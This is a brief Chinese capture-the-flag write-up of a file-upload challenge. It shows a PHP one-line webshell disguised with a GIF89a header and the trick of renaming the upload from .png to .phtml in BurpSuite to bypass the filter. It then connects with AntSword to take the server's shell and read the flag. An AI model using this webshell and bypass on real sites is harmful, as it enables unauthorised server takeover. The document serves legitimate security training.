CTF中的BUUCTF之[ACTF2020 新生赛]Upload
启动我们的挑战项目
好吧,不管怎么看都是文件上传类型的题目。那么我们就用我经常用的一句话木马吧:
GIF89a?
<script language="php">eval($_POST['zyh']);</script>
然后将上面的内容改成1.png。
然后上传我们的1.png(别忘记了要打开BurpSuite来进行抓包)。将BurpSuite抓到的包发送到Repeater模块
然后把文件名1.png改成1.phtml
然后用蚁剑工具来进行连接
连接成功,并且拿到了对方的Shell
最后发现flag保存在根目录下的flag文件里